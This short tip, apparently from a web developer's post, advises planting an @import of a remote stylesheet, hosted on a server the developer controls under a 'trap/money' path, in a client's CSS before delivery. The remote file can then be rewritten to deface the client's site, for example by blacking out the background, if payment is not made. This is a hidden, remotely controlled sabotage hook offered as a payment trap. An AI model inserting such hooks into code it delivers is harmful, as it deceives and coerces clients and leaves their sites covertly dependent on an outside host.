Before uploading the product, write to the css file,
for example.
1 2 3 |
@import url(http://Umustpaymoneycom/trap/money/style.css); |
1 2 3 4 5 |
body { background-color :white; } |
If the client does not pay the money, rewrite this css.
1 2 3 |
body { background-color :black; } |